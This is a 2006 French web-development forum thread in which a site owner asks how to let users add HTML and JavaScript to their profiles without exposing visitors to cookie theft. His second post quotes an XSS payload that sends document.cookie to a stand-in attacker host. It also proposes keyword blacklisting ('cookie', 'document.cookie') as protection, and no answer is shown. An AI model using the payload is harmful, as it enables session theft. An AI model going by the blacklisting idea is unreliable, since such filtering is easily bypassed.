sécuritée du html sur site distant et vol de cookie

sécuritée du html sur site distant et vol de cookie - HTML/CSS - Programmation

Marsh Posté le 18-07-2006 à 23:06:17    

Bonjour à tous.
 
Je voudrais proposer prochainement aux utilisateurs de mon site de pouvoir mettre du html et javascript dans leurs profil.
Mème si ce sont des personnes "normales" qui n'iront pas sabotez leur propre page à coups de alert(lol);, d'autres personnes pourraient elles ètre tenté de piquer les mots de passe.
 
Je me demandais si le simple fait d'utiliser un str_replace de "cookie" en "cook!e" pourrait bloquer ces tentatives ?
Je sais que c'est bien crade, mais quel fonction laisse le javascript et empèche le vol de cookies ?  [:barthaliastoxik]  
 
D'ailleur si l'un d'entre vous à plus d'infos sur le vol de cookie, n'hésitez pas à faire tourner le lien.
Merci


Message édité par scull le 18-07-2006 à 23:06:47
Reply

Marsh Posté le 18-07-2006 à 23:06:17   

Reply

Marsh Posté le 18-07-2006 à 23:20:27    

Visiblement le vol de cookie ce fait avec ce genre de commande :

Code :
  1. <img src="javascript:var ima=new Image(); ima.src=' htp://site_du_pirate.com/recup.php?cookie='+document.cookie">


 
Donc si je bannis le mot "document.cookie", il n'est plus possible de copier les cookies ? Confirmation ?


Message édité par scull le 18-07-2006 à 23:21:41
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed